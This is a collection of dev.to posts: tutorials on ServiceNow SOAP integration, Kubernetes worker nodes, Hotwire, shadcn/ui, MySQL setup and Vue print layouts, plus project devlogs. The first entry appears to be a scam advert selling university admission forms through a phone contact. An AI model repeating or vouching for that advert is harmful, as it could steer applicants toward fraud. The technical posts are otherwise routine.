1,878,535 | Covenant University Ota,2024/2025 Session Admission forms | Covenant University Ota,2024/2025 Session Admission forms are on sales.Contact the admin of the... | 0 | 2024-06-05T21:23:20 | https://dev.to/admin_dept_202e474d82b68c/covenant-university-ota20242025-session-admission-forms-m84 | scrum, javascript | Covenant University Ota,2024/2025 Session Admission forms are on sales.Contact the admin of the school ☎️ 07065086538 Dr ANITA for purchase of the form and how to register on-line. The general public is hereby informed that application forms for admission into the degree Programme 2024-2025 academic session. NURSING ADMISSION FORMS,INTER SCHOOL TRANSFER FORM,DIRECT ENTRY FORMS,MASTERS AND PHD FORMS,& PART-TIME FORMS are out and on sales in the school premises. Call the School Admin.DR.Mrs Anita on☎️ 07065086538 for more details on how to apply and register online. The School Authority requires all candidates applying for admission into any of its courses to possess Five (5) O' Level Credit Level Passes at not more than two (2) sittings to include English Language and Mathematics and three (3) other subjects relevant to course. | admin_dept_202e474d82b68c |
1,878,345 | Leveraging SOAP APIs for Outbound Integration: A Step-by-Step Guide. | Soap API: Outbound Integration SOAP (Simple Object Access Protocol) is an XML-based... | 0 | 2024-06-05T21:23:05 | https://dev.to/sophiasemga/leveraging-soap-apis-for-outbound-integration-a-step-by-step-guide-245c | webdev, integration, api, tutorial | ## SOAP API: Outbound Integration
**SOAP (Simple Object Access Protocol)** is an XML-based messaging protocol used for exchanging information between two applications. A SOAP web service is described by a **WSDL** file, which contains the necessary information about what the web service does and where it is located.
**WSDL** (Web Services Description Language) is the XML format in which that description is represented. In ServiceNow, all tables and import sets dynamically generate a WSDL XML document that describes the table schema and available operations.
You can obtain a table's WSDL by using a URL call to your instance that contains the name of the target table and the WSDL parameter (e.g., `https://myinstance.servicenow.com/incident.do?WSDL`).
To get started with SOAP, you need a source instance and a target instance (the target instance could be another third-party application or another ServiceNow instance).


#### *Use case: Whenever an incident record is created in the source instance, that same record should get inserted/populated in the target instance/application.*
We are going to create an inbound integration on the target instance, essentially an import set that will synchronously transform the incoming data **(SOAP message + Basic AUTH)** based on associated transform maps.
##### <u>Web Services > Inbound</u>
- `Label` - Name of the import: Incident demo
- `Name` - Internal name of the import: u_incidentdemo
- Check <u>Copy fields from target table</u>, because we need all the fields that are in the table
- `Target Table` - The table you're deriving data from: Incident
### Click Create

- Then click "Automapping Assist" to pull out all the fields from the target table, creating an import set.

## What Is The Purpose?
To generate the table's WSDL URL. If you type the label name in the navigator, the import set comes up as a module. Click on it and copy the WSDL URL.

### On to the Source Instance
On the source instance, search for SOAP API - SOAP Message. Keep in mind that our source instance is performing the outbound integration because a record is being ‘thrown out’ of the system.
On SOAP Message:
**Click New**

1. **Name:** the name of the SOAP message: IncidentDemo
(the naming convention doesn't matter)
2. **WSDL:** the WSDL URL copied from the target instance

3. **Authentication Type:** Basic
4. **Basic Auth Profile:** serves as the credentials used to authenticate with the target instance, which verifies the username and password against its authentication system before processing SOAP requests.
To get the Basic Auth profile, go to the target instance to get your system administrator username and password. Make sure it’s set or reset it if need be. (`Sys_user.LIST` to access the admin account.)

Once the username and password have been reset, go back to the source instance, add them to the Basic Auth Profile field, then save the form.

5. Once you save it, you will see a "Generate Sample Soap Messages" related link. This is a no-code way to insert the requested data without any customization (scripting).

6. Click on the link, and it will download the WSDL of the target instance's target table from the URL, generating the SOAP methods:
- `update` - updates records.
- `getRecords` - retrieves multiple records.
- `deleteRecord` - deletes a record.
- `insert` - inserts a record.
- `deleteMultiple` - deletes multiple records.
- `get` - retrieves a single record.

**Click on the Insert Method**, because we’re going to be inserting a new record on the target instance.
1. Set the authentication type to Basic and choose the Basic Auth profile we created.

2. In the envelope field, we see all the fields that make up an incident record as XML; you can remove fields that aren't required or part of the requirement.

3. Once done, save the form.
4. Go to the "<u>Autogenerate Variables</u>" related link on the form, which generates variable substitutions for all template variables in the envelope XML.
5. Once generated, we are given the option to test by providing these variables with test values to validate that the integration succeeds, before implementing a business rule to customize the integration.

6. After giving it test values, click on the Test related link. Upon testing, review the HTTP status to ensure it states **200**, meaning the test was successful and the integration worked.

### How do we check if the incident record was created/inserted in the target instance?
Go to the target instance, navigate to the target table (Incident), and check if the test record has been inserted.

Our test record got inserted—great job! You successfully performed SOAP integration. 😊

**However**, the priority came through with a different value because the priority field is derived from two other fields (**impact and urgency**). To set the priority field correctly, you also have to set values for the impact and urgency fields.
Other than that, you successfully performed a SOAP integration that inserted a new record into another application!
### Check out the YouTube video here:
https://youtu.be/mAOIWpEiTF8?si=AYIke1KphsITk1CP
It walks through creating an after business rule that inserts a new incident record into the target instance whenever an incident record is created in the source instance.
PS: Never use a **"before"** business rule during integration, because you don't want the record to get stored in the target system before the source system.
#### Key things to keep in mind when watching the YouTube video:
We are going to be creating an “After” business rule with the “Insert” operation.
For the Advanced field, to set up the code, go back to the SOAP message insert function, click on the "<u>Preview Script Usage</u>" related link, copy the previewed code, and paste it into the business rule's Advanced field.
### What is the code doing?
The code calls the SOAP message we created, 'IncidentDemo', and the 'insert' function used in that SOAP message.
It then sets the parameters; the values in our parameters came from testing, so we need to replace them with the current record's values.
Once that’s done, save your business rule, and again, by creating a new incident on the source instance, go to your target instance to make sure that it got populated there as well.
PS: It’s very important to keep in mind that only the field values that are being set in the parameter would show up in the target instance.
___________________________________
Thank you for reading and watching! I hope this lesson broke down SOAP integrations properly. To learn more about SOAP, check out the product documentation:
•https://docs.servicenow.com/bundle/tokyo-application-development/page/integrate/inbound-soap/concept/c_SOAPWebService.html
| sophiasemga |
1,878,484 | Kubernetes Worker Node Components | Our article provides an overview of these components and their roles in supporting containerized... | 0 | 2024-06-05T21:19:50 | https://dev.to/giftbalogun/kubernetes-worker-node-components-ihp | Our article provides an overview of these components and their roles in supporting containerized applications in a Kubernetes cluster. To properly understand this article, you should have an understanding of the Kubernetes control plane.
The container runtime is responsible for tasks like pulling images from a repository and isolating resources for containers.
The kubelet acts as the primary node agent, ensuring that the containers for the pods assigned to its node are running. It interacts with the container runtime using the Container Runtime Interface (CRI) to manage containerized workloads.
Kube-proxy handles networking by maintaining network rules for pod communication. It watches Service and Endpoints resources and updates iptables rules for packet routing within the Linux kernel.
Service resources provide stable IP addresses for connecting to pods, facilitating communication within or outside the cluster. Services work with Endpoints resources to route client requests to the appropriate pods.
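To illustrate the Service-to-Endpoints relationship described above, a minimal Service manifest could look like this (the names, labels, and ports are placeholders):

```yaml
apiVersion: v1
kind: Service
metadata:
  name: web
spec:
  selector:
    app: web           # pods matching this label become the Service's Endpoints
  ports:
    - port: 80         # stable port on the Service's cluster IP
      targetPort: 8080 # container port on the selected pods
```

Kube-proxy watches objects like this and programs iptables rules so that traffic sent to the Service's port 80 is routed to port 8080 on one of the matching pods.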
Learn more: https://everythingdevops.dev/kubernetes-architecture-explained-worker-nodes-in-a-cluster/ | giftbalogun | |
1,872,328 | Playing around with Hotwire ⚡️ | Hey 👋, Let's jump into my bi-weekly update in the ramen profitability series, where I'm sharing... | 27,288 | 2024-06-05T21:17:15 | https://dev.to/joelzwarrington/playing-around-with-hotwire-2a2a | webdev, javascript, rails | Hey :wave:,
Let's jump into my bi-weekly update in the [ramen profitability series](https://dev.to/joelzwarrington/series/27288), where I'm sharing progress on my latest project: [HomeSuiteApartment](https://homesuiteapartment.com), a tool to manage rental properties.
In this update, I've been focused on the workflow for inquiring about units and scheduling viewings, and I touched up the subscription page. Given my current schedule (working full-time with a 1-year-old), I'm pretty happy with what I was able to accomplish in these past two weeks, and I'm looking forward to setting an open-beta launch date in the next month or two.
## Updating the listing page
I updated the listing page and have since added a form to submit inquiries, plus additional messages on top of the inquiry.

{% youtube HqlNv13deXg %}
Once the inquiry is submitted, the property manager will be able to respond in their inbox, and schedule a viewing.

{% youtube ZuqR0GNJoys %}
As you can see in the example above, I'm using [Turbo Frames](https://turbo.hotwired.dev/) to give a single-page application feel, while not having to write any JavaScript.
Here's a boiled-down example of how you can accomplish a view like this:
```erb
<%= link_to "View inquiry", inquiry, data: { turbo_frame: "inquiry" } %>
<%# this is a placeholder for the selected inquiry %>
<%= turbo_frame_tag "inquiry" %>
```
Now, in your `#show` action's view, you can simply wrap your item in a matching turbo frame tag; instead of following the redirect as a full page visit, Turbo will replace the frame with id `inquiry` using the matching frame from the response.
```erb
<%= turbo_frame_tag "inquiry" do %>
<%= turbo_frame_tag inquiry do %>
<p>This is an inquiry!</p>
<% end %>
<% end %>
```
A major benefit to this is that if you want to implement single-page-application-like features, all you need to do is use a few custom HTML elements and some data attributes. So if you're a Ruby on Rails developer, you really won't need to do much to decompose your views into frames.
You can update [Turbo Frames](https://turbo.hotwired.dev/handbook/frames) on form submission using [Turbo Streams](https://turbo.hotwired.dev/handbook/streams). [Turbo Streams](https://turbo.hotwired.dev/handbook/streams) allow you to modify [Turbo Frames](https://turbo.hotwired.dev/handbook/frames) very precisely with these actions: _append_, _prepend_, (insert) _before_, (insert) _after_, _replace_, _update_, _remove_, and _refresh_.
In my example, when I submit a new message to the inquiry, I'm appending the message to the list, and also am clearing out the message form. Similar to decomposing with [Turbo Frames](https://turbo.hotwired.dev/handbook/frames), you're only ever sprinkling in things as needed, and you don't need to add any boilerplate up-front.
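In my case, that stream response could be sketched like this (the partial names and the `new_message` frame id are assumptions for illustration, not the app's actual names):

```erb
<%# app/views/messages/create.turbo_stream.erb %>
<%# 1. Append the new message to the list with id="messages" %>
<%= turbo_stream.append "messages" do %>
  <%= render @message %>
<% end %>

<%# 2. Replace the form (id="new_message") with a fresh, empty one %>
<%= turbo_stream.replace "new_message" do %>
  <%= render "messages/form", inquiry: @inquiry %>
<% end %>
```

When the controller responds with `format.turbo_stream`, Turbo applies each action to the matching element without a full page reload.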
Most of your controllers still function as normal Ruby on Rails controllers using redirects, but when you need the extra functionality, or want to speed up page loads, you can use [Turbo Streams](https://turbo.hotwired.dev/handbook/streams).
I highly recommend checking out [Hotwire](https://hotwired.dev/); it's really been a breath of fresh air for me. You get to do a lot more with less JavaScript, and it gives you the same benefits as other frameworks/libraries (such as React) without having to significantly change your development process.
If you're interested, you should have a look at the [Hotrails tutorial](https://www.hotrails.dev/) which goes over all of the concepts introduced by Turbo and Stimulus.
## Subscriptions
In the last update, I got subscriptions working, and integrated with [Stripe](https://stripe.com). I'm using the [Pay gem](https://github.com/pay-rails/pay) to manage the subscriptions, as it provides a lot of built-in functionality, and the [Stripe Ruby Client](https://github.com/stripe/stripe-ruby) for other API calls not supported with the [Pay gem](https://github.com/pay-rails/pay).
In this update, I went ahead and fleshed out the page with pricing and features. So we started with this:

and, ended with this:

I won't take credit for the re-design though. If you're using the [Tailwind CSS Library](https://tailwindcss.com/) you should checkout [Tailwind UI](https://tailwindui.com/). It's helped me scaffold a few components and pages quite easily, without having a designer onboard.
## What's next!
- Further improving the viewing + inquiry pages
- Improve the unit to listing workflow
See you in two weeks! | joelzwarrington |
1,878,482 | Shadcn/ui codebase analysis: site-header.tsx explained. | I wanted to find out how the header is developed on ui.shadcn.com, so I looked at its source code.... | 0 | 2024-06-05T21:15:44 | https://dev.to/ramunarasinga/shadcnui-codebase-analysis-site-headertsx-explained-4l3k | javascript, nextjs, opensource, shadcnui | I wanted to find out how the header is developed on [ui.shadcn.com](http://ui.shadcn.com), so I looked at its [source code](https://github.com/shadcn-ui/ui/blob/main/apps/www/app/(app)/layout.tsx). Because shadcn-ui is built using app router, the files I was interested in were [Layout.tsx](https://github.com/shadcn-ui/ui/blob/main/apps/www/app/(app)/layout.tsx) and [site-header.tsx](https://github.com/shadcn-ui/ui/blob/main/apps/www/components/site-header.tsx).
In this article, we will find out the below items:
1. Where is the code related to the header section shown in the image below?

2\. Header code snippet
3\. Components used in Header
> _Want to learn how to build shadcn-ui/ui from scratch? Check out_ [_build-from-scratch_](https://github.com/Ramu-Narasinga/build-from-scratch) _and give it a star if you like it. Solve challenges to build shadcn-ui/ui from scratch. Stuck or need help? A_ [_solution is available_](https://tthroo.com/build-from-scratch)_._
Where is the code related to the header section?
------------------------------------------------
layout.tsx has the code below

As you can see, the SiteHeader component is rendered in AppLayout, and [site-header.tsx](https://github.com/shadcn-ui/ui/blob/main/apps/www/components/site-header.tsx#L14) has the code related to the header section.
Header code snippet
-------------------
The code below is from [site-header.tsx](https://github.com/shadcn-ui/ui/blob/main/apps/www/components/site-header.tsx)
```
import Link from "next/link"
import { siteConfig } from "@/config/site"
import { cn } from "@/lib/utils"
import { CommandMenu } from "@/components/command-menu"
import { Icons } from "@/components/icons"
import { MainNav } from "@/components/main-nav"
import { MobileNav } from "@/components/mobile-nav"
import { ModeToggle } from "@/components/mode-toggle"
import { buttonVariants } from "@/registry/new-york/ui/button"
export function SiteHeader() {
return (
<header className="sticky top-0 z-50 w-full border-b border-border/40 bg-background/95 backdrop-blur supports-[backdrop-filter]:bg-background/60">
<div className="container flex h-14 max-w-screen-2xl items-center">
<MainNav />
<MobileNav />
<div className="flex flex-1 items-center justify-between space-x-2 md:justify-end">
<div className="w-full flex-1 md:w-auto md:flex-none">
<CommandMenu />
</div>
<nav className="flex items-center">
<Link
href={siteConfig.links.github}
target="\_blank"
rel="noreferrer"
>
<div
className={cn(
buttonVariants({
variant: "ghost",
}),
"w-9 px-0"
)}
>
<Icons.gitHub className="h-4 w-4" />
<span className="sr-only">GitHub</span>
</div>
</Link>
<Link
href={siteConfig.links.twitter}
target="\_blank"
rel="noreferrer"
>
<div
className={cn(
buttonVariants({
variant: "ghost",
}),
"w-9 px-0"
)}
>
<Icons.twitter className="h-3 w-3 fill-current" />
<span className="sr-only">Twitter</span>
</div>
</Link>
<ModeToggle />
</nav>
</div>
</div>
</header>
)
}
```
[MainNav component](https://github.com/shadcn-ui/ui/blob/main/apps/www/app/(app)/examples/dashboard/components/main-nav.tsx) is responsible for the section below

[MobileNav component](https://github.com/shadcn-ui/ui/blob/main/apps/www/components/mobile-nav.tsx#L16) is responsible for the section below

[Command menu.tsx](https://github.com/shadcn-ui/ui/blob/main/apps/www/components/command-menu.tsx#L28) is responsible for the search functionality below

[ModeToggle.tsx](https://github.com/shadcn-ui/ui/blob/main/apps/www/components/mode-toggle.tsx#L15) is responsible for the element shown below

About me:
---------
Website: [https://ramunarasinga.com/](https://ramunarasinga.com/)
Linkedin: [https://www.linkedin.com/in/ramu-narasinga-189361128/](https://www.linkedin.com/in/ramu-narasinga-189361128/)
Github: [https://github.com/Ramu-Narasinga](https://github.com/Ramu-Narasinga)
Email: [ramu.narasinga@gmail.com](mailto:ramu.narasinga@gmail.com)
References:
-----------
1. [https://github.com/shadcn-ui/ui/blob/main/apps/www/app/(app)/layout.tsx](https://github.com/shadcn-ui/ui/blob/main/apps/www/app/(app)/layout.tsx)
2. [https://github.com/shadcn-ui/ui/blob/main/apps/www/components/site-header.tsx](https://github.com/shadcn-ui/ui/blob/main/apps/www/components/site-header.tsx)
3. [https://github.com/shadcn-ui/ui/blob/main/apps/www/components/mode-toggle.tsx#L15](https://github.com/shadcn-ui/ui/blob/main/apps/www/components/mode-toggle.tsx#L15)
4. [https://github.com/shadcn-ui/ui/blob/main/apps/www/components/main-nav.tsx](https://github.com/shadcn-ui/ui/blob/main/apps/www/components/main-nav.tsx)
5. [https://github.com/shadcn-ui/ui/blob/main/apps/www/components/mobile-nav.tsx#L16](https://github.com/shadcn-ui/ui/blob/main/apps/www/components/mobile-nav.tsx#L16) | ramunarasinga |
1,878,481 | Babylon.js Browser MMO - DevLog- Update #6 - Character UI | Hi! Today I was working on the UI. I fixed player name text (it's not mirror reflected anymore). I... | 0 | 2024-06-05T21:12:42 | https://dev.to/maiu/babylonjs-browser-mmo-devlog-update-6-character-ui-o23 | babylonjs, gamedev, indie, mmo | Hi!
Today I was working on the UI. I fixed the player name text (it's not mirror-reflected anymore), added a tooltip with name and class when hovering over players, and added an ability panel for skills and some actions like character stats, inventory, etc.
Hope You like it!
{% youtube 3vzId1DzR5g %} | maiu |
1,878,479 | POKT NETWORK ACTORS | In the social media world, our attention to content is revenue for the company. In a blockchain... | 27,614 | 2024-06-05T21:10:21 | https://paragraph.xyz/@pokt-hub/pokt-network-actors | shannonupgrade, testnet, rpc, web3 | In the social media world, our attention to content is revenue for the company. In a blockchain world, the blocks are revenue for the chain.
Just as a company shares its revenue among shareholders, employees, and investors, blockchain revenue is generally shared among the contributors to the block.
> In most chains, block contributors are the demand side, the supply side, and the DAO.
- The demand side makes it possible for users to consume whatever services the chain is offering.
- The supply side ensures the data produced from the activity of consuming the service is stored in a manner that is easy to retrieve.
- The DAO coordinates all activities, ensuring they are beneficial to everyone.
> POKT Network, a simple yet powerful protocol that is your API to the open internet.
In the most efficient manner, POKT Network coordinates the movement of data from over 60 blockchains to its destination at low latency and high uptime using Remote Procedure Calls (RPC).
POKT Network’s revenue is brought in by gateways who represent the demand side and shared between the DAO and the Node runners, who represent the supply side.
As we have come to learn in blockchains, revenue is earned only when work is done. This means there are different elements that work together to do the work, generally called actors.
In the upcoming Shannon upgrade, work is done by 5 actors, each with its own responsibilities.
Together, they seek to enable permissionless demand, where anyone can use POKT to consume RPCs without restriction, revamp the tokenomics, and create opportunities to build exciting products that are not supported in the current version.
Let’s learn more about these actors and understand what they do.
[POKT Network](https://www.pokt.network/)
## Applications
POKT application actor enable the gateways to sign and relay transactions.
Gateways have to stake an application to serve RPC requests to their customers. Staking an application takes two parameters:
- service_ids - This represents the chains whose relays the application needs, generally the service offered by POKT Network that the application consumes.
- stake_amount - This is an amount in upokt that the gateway has staked in order to relay requests to POKT Network on behalf of Applications.
Upon the Shannon upgrade, staking an application through running a gateway will be permissionless.
See the docs https://dev.poktroll.com/protocol/actors/application
## Gateways
The Gateway actor in POKT Network is a first-class citizen that lives onchain.
https://dev.poktroll.com/protocol/actors/gateway
With gateways being such an integral part of POKT Network, a lightweight gateway server that allows anyone to spin up a gateway and start serving requests is available; it requires at least 4 vCPUs, 1GB RAM, and 1GB storage.
If you would like to contribute or try the Gateway Server, see docs below.
https://docs.pokt.network/gateways/host-a-gateway
> The gateway server makes it easier to interact with the onchain gateway actor.
## Supplier
Suppliers are onchain actors. They stake their POKT to earn POKT in exchange for providing services.
They are node runners who serve the relays requested by applications.
At the protocol level, they are supported by two onchain modules:
- Supplier module - covers the staking, unstaking, and supplier-querying transactions.
- Proof module - the 'work' module; it is responsible for creating and querying claims, as well as submitting and querying proofs.
You can learn more about Supplier actors from the official docs.
https://dev.poktroll.com/protocol/actors/supplier
> The above three actors, Applications, Gateways, and Suppliers, reside onchain.
## AppGate Server
The AppGate Server is responsible for relaying a request from the client's dApp to the supplier of the requested service, executing the logic of a relay from the moment it leaves the client's dApp to the moment it reaches the supplier.
To put it into perspective, a Polygon wallet service that is under-DePIN-ed by POKT Network would require a Gateway to provide polygon endpoints that the wallet would then use to send requests to the POKT Network.
The Gateway in this case would require an Application to be staked in order to sign and send requests on its behalf.
To customize the business logic, for example capping the free tier at 1,000,000 requests per month, you implement that logic within the AppGate Server.
> This actor is utilized and consumed by the onchain Gateway Actor.
See the docs https://dev.poktroll.com/protocol/actors/appgate_server
## RelayMiner
It provides the ability for individuals to offer services through POKT Network alongside a staked Supplier.
All Suppliers providing services on POKT Network have to run a relay miner alongside the software that is providing the service, as an example a node runner serving Polygon relays needs to have access to a Polygon node alongside a POKT node to serve Polygon relays on POKT Network.
Through this actor, POKT Network supports non-custodial staking, since it is responsible for proxying relay requests between an AppGate Server and the supplied service.
This actor is utilized and consumed by the Supplier Actor.
Learn more at https://dev.poktroll.com/protocol/actors/relay_miner
The above two actors, the RelayMiner and the AppGate Server, reside offchain.
## Conclusion
> POKT Network is an important piece of infrastructure for Web3 with no comparison, both centralized and decentralized.
To give an overview of how POKT Network achieves high uptime, cost-effectiveness, and low latency in RPC, here is how it happens.
The client’s dApp interacts with the Gateways through endpoints.
Gateways interact with the staked Applications, enabling them to relay requests on their behalf to the protocol.
Once at the protocol level, the RelayMiner run by the Supplier receives the relay request and proxies it to the required service.
It is worth noting that for the RelayMiner to run, it requires a staked Supplier, which is a staked POKT node.
Supplier A, serving requests for the Polygon wallet service discussed earlier, would need a POKT node running so that the RelayMiner can receive relay requests and proxy them to the Polygon node.
How the interaction of all the actors of the protocol happens is a topic we will keep exploring.
_Until next time, Stay POKT._
| pokthub |
1,878,477 | Step-by-step guide for how to install an SQL server on Ubuntu 22.04 | Step-by-step guide for how to install an SQL server on Ubuntu 22.04 Installing... | 0 | 2024-06-05T21:06:43 | https://dev.to/oyololatoni/step-by-step-guide-for-how-to-install-an-sql-server-on-ubuntu-2204-2ahk | mysql, linux, ubuntu, devops |
## Step-by-step guide for how to install an SQL server on Ubuntu 22.04

## **Installing the SQL server**
First, update your package lists and install the MySQL server:

```bash
sudo apt-get update
sudo apt-get install mysql-server
```

Then start the server and verify that it is running:

```bash
sudo systemctl start mysql.service
sudo systemctl status mysql.service
```
The result should look like this:

## Configure MySQL
You will need to configure the root account's authentication method if you are running the installation on an Ubuntu machine, because password authentication for root is disabled there by default. To avoid errors later, open the MySQL shell:

```bash
sudo mysql
```
Change the password for root using ALTER USER:

```sql
mysql> ALTER USER 'root'@'localhost' IDENTIFIED WITH mysql_native_password BY 'password';
```

Exit after making this change:

```sql
mysql> exit
```
## Secure your MySQL root user account
To secure your server, run the following command to set up your password policy:

```bash
sudo mysql_secure_installation
```
The password policy you choose will apply to user accounts created afterwards.
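You can inspect the resulting policy afterwards from the MySQL prompt; `validate_password` is the component that `mysql_secure_installation` configures:

```sql
-- Show the password-validation settings currently in effect
mysql> SHOW VARIABLES LIKE 'validate_password%';
```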
Next, authenticate using the root user's password:

```bash
mysql -u root -p
```
This command gives the root user access to the MySQL CLI and lets you interact directly with the MySQL server.
Then go back to using the default authentication method with this command:

```sql
mysql> ALTER USER 'root'@'localhost' IDENTIFIED WITH auth_socket;
```

This will allow you to connect using the `sudo mysql` command again.
## **Creating default/new MySQL user and its privileges**
It is bad OpSec to use the root account to perform regular day-to-day actions on the database. The better option is to create a user account with limited privileges.

Start by logging in as root with the following command:

```bash
sudo mysql
```
Alternatively, if you have previously set a password for the root account, use this instead:

```bash
mysql -u root -p
```
Next, create a new user:

```sql
mysql> CREATE USER 'username'@'host' IDENTIFIED WITH authentication_plugin BY 'password';
```
After entering the command, follow the prompt and fill in your username and hostname (use localhost if you're connecting from the same machine).

For authentication, you have a few plugin options:

- `auth_socket` - provides strong security without requiring a password, but has the shortcoming of preventing remote connections.
- `caching_sha2_password` - the default MySQL plugin, although some versions of PHP are not compatible with it.
- `mysql_native_password` - the traditional password-based plugin, widely compatible.

```sql
mysql> CREATE USER 'jack'@'localhost' IDENTIFIED WITH mysql_native_password BY 'password';
```
You can also alter an existing user:

```sql
mysql> ALTER USER 'jack'@'hostname' IDENTIFIED WITH mysql_native_password BY 'password';
```
## Assigning privileges
After creating the user, you can grant it privileges with the following syntax:

```sql
mysql> GRANT PRIVILEGE ON database.table TO 'username'@'host';
```

Using `GRANT ALL PRIVILEGES` instead will give the user superuser privileges similar to those of root. Such a flag would defeat the purpose of creating a separate user account from root.

The PRIVILEGE placeholder represents which actions a user is allowed to perform. Global privileges can also be granted by replacing `database.table` with `*.*`.
Below we grant the user permission to create, alter, and drop tables, and to insert, select, update, and delete rows, by using CREATE, ALTER, DROP, INSERT, SELECT, UPDATE and DELETE respectively:

```sql
mysql> GRANT CREATE, ALTER, DROP, INSERT, UPDATE, DELETE, SELECT ON *.* TO 'jack'@'hostname' WITH GRANT OPTION;
```
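If you'd rather scope the account to a single database, which is usually a safer default, the same GRANT can target one schema; `shop` here is a placeholder database name:

```sql
-- Grant row-level operations on one database only
mysql> GRANT SELECT, INSERT, UPDATE, DELETE ON shop.* TO 'jack'@'hostname';
```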
The WITH GRANT OPTION flag allows the user to grant the privileges it holds to other users.
Next, use the FLUSH PRIVILEGES command to reload the grant tables and free up any memory the server cached as a result of the preceding statements:

```sql
mysql> FLUSH PRIVILEGES;
```
Afterwards, you can exit the MySQL CLI:

```sql
mysql> exit
```

You can now log back in using your new credentials:

```bash
mysql -u jack -p
```
## Testing the MySQL server
You can now verify that the MySQL server is running with the following command:

```bash
systemctl status mysql.service
```

Alternatively, you can connect to the MySQL database using the administrative command-line tool mysqladmin:

```bash
sudo mysqladmin -p -u jack version
```
| oyololatoni |
1,878,476 | new member | am new here | 0 | 2024-06-05T21:03:55 | https://dev.to/dauda_ishaya_6a0327b1bdd0/new-member-4c8b | am new here | dauda_ishaya_6a0327b1bdd0 | |
1,878,401 | Designing Print-Ready Components in Your Web App | In many web applications, there comes a time when you need to add print functionality. Whether it's... | 0 | 2024-06-05T21:02:01 | https://dev.to/joseph42a/designing-print-ready-components-in-your-web-app-3i00 | webdev, print, frontend, javascript | In many web applications, there comes a time when you need to add print functionality. Whether it's for printing invoices, reports, or any other custom components, having a seamless and efficient print solution is crucial. In this blog post, I'll demonstrate how to handle printing in your Vue.js application. The approach we'll cover is also applicable to other frameworks, enabling you to design your print components directly in Vue and print them without the need for manual HTML and CSS in a custom script tag.
## Approach Explanation
1. Add Specific Route for Print: Create a dedicated route for your print component to ensure it opens in a new window with the correct context.
2. Design Your Print Component: Style your print component with all necessary elements, ensuring it appears exactly as desired for printing.
3. Open Print Page in New Window: Use JavaScript to open the print route in a new window, providing a seamless transition for users.
4. Print the Component on Mounted: Trigger the print function directly once the component is mounted, ensuring the print dialog appears immediately.
5. Close the Window After Print: Automatically close the print window after the user completes the print action, enhancing the user experience.
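Steps 3 to 5 above can be sketched in plain JavaScript. The route path `/print/invoice` and the window dimensions are assumptions for illustration (use whatever route you registered for your print component); the URL-building helper is split out from the `window.open` call so it stays easy to test:

```javascript
// Pure helper: build the URL for the dedicated print route.
// basePath and id are placeholders; substitute your own route names.
function buildPrintUrl(basePath, id) {
  return `${basePath}/${encodeURIComponent(String(id))}`;
}

// Browser-only helper: open the print route in a new window (step 3).
// The print component itself calls window.print() once it has mounted
// (step 4) and window.close() after printing (step 5).
function openPrintWindow(basePath, id) {
  const url = buildPrintUrl(basePath, id);
  // Omit the third argument if you prefer a full tab instead of a popup.
  return window.open(url, '_blank', 'width=900,height=1200');
}
```

Calling `openPrintWindow('/print/invoice', 42)` from a button handler would open `/print/invoice/42` in a new window, where the print component takes over.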
## Handling Print in Vue.js
First, let's create a Vue component dedicated to printing. This component is responsible for rendering the content to be printed and initiating the print action; it acts like a template. The template will contain the content we want to print, including an image and a table with sample data.
```
<script setup lang="ts">
import { DUMMY_DATA } from '@/DUMMY';
import { ref, watch } from 'vue';
/**
* This Component is only for printing
* Design in vuejs and print what you see
*/
const imageLoaded = ref(false);
// Once header image loaded print & close window
watch(imageLoaded, () => {
window.print();
window.close();
});
</script>
<template>
<Teleport to="body">
<div class="modal" style="position: absolute; top: 0; left: 0; width: 100%">
<div id="printContainer" style="background-color: white">
<table style="width: 100%">
<thead>
<tr>
<td colspan="7" class="invoice-header">
<div class="header-container">
<div>
<img
width="100"
src="@/assets/logo.svg"
@load="imageLoaded = true"
/>
</div>
<h1>Your Company</h1>
<h3>Your Address</h3>
</div>
</td>
</tr>
<tr>
<th>Product</th>
<th>Unit Price</th>
<th>Amount</th>
<th>Total Price</th>
</tr>
</thead>
<tbody>
<tr v-for="item in DUMMY_DATA" :key="item.id">
<td>{{ item.product }}</td>
<td>{{ item.unitPrice }}</td>
<td>{{ item.amount }}</td>
<td>{{ item.totalPrice }}</td>
</tr>
</tbody>
</table>
</div>
</div>
</Teleport>
</template>
```
Here I have a table that displays some data. Note that I've used an image in my invoice; since the approach is to print the opened window directly, I added a simple state to track whether the image has loaded, so printing only happens after the image is completely loaded. If your template has no image, you can omit this and simply trigger the print once the component is mounted.
Also note that I use Teleport to move the content to the body for printing.
And here is the important part: the print-specific CSS styles.
```
<style>
/* General print styles here */
#printContainer {
table {
width: 100%;
border-collapse: collapse;
break-inside: auto;
page-break-inside: auto;
}
.header-container {
display: flex;
justify-content: space-between;
align-items: center;
}
table td,
table th {
padding: 1.5mm;
border: 2px solid #ccc;
vertical-align: top;
font-size: inherit;
}
table td.invoice-header {
border: none;
}
table th {
text-align: left;
vertical-align: bottom;
color: rgb(0, 0, 30);
background-color: #04aa6d;
}
tr:nth-child(even) {
background-color: #f2f2f2;
}
tr:hover {
background-color: #ddd;
}
thead {
display: table-header-group;
}
tfoot {
display: table-footer-group;
}
tr {
page-break-inside: avoid;
page-break-after: auto;
}
table td,
table th,
table tr {
/* Prevent elements from being split across pages in paginated media (like print) */
break-inside: avoid;
/* Automatically insert a page break after the element, if needed */
break-after: auto;
}
}
/* Apply styles only when the document is being printed */
@media print {
/* Apply styles to the printed page */
@page {
size: auto;
/* Set the page margins, hide default header and footer */
margin: 0.15in 0.3in 0.15in 0.3in !important;
}
body {
/* Ensure that colors are printed exactly as they appear on the screen */
print-color-adjust: exact;
-webkit-print-color-adjust: exact;
}
}
</style>
```
## Importance of Print-Specific Styles
When implementing print functionality in your web application, it's essential to define specific styles that ensure your content is presented correctly when printed. Here, we'll discuss the crucial styles used in our Vue.js print component and their importance in achieving a high-quality printed output.
```
table {
width: 100%;
border-collapse: collapse;
break-inside: auto;
page-break-inside: auto;
}
```
`break-inside: auto;` `page-break-inside: auto;` Allow the table itself to break across pages when it is longer than one page (the legacy `page-break-inside` property is kept for older browsers).
## Repeat the header and footer when printing
```
thead {
display: table-header-group;
}
tfoot {
display: table-footer-group;
}
```
`display: table-header-group;` `display: table-footer-group;` Ensures the table headers and footers are repeated on each printed page.
## Prevent split rows across pages
```
tr {
page-break-inside: avoid;
page-break-after: auto;
}
```
`page-break-inside: avoid;` Prevents rows from being split across pages.
`page-break-after: auto;` Automatically inserts a page break after the row if needed.
## Print Media Query
```
@media print {
@page {
size: auto;
margin: 0.15in 0.3in 0.15in 0.3in !important;
}
body {
print-color-adjust: exact;
-webkit-print-color-adjust: exact;
}
}
```
## Remove default header and footer when printing
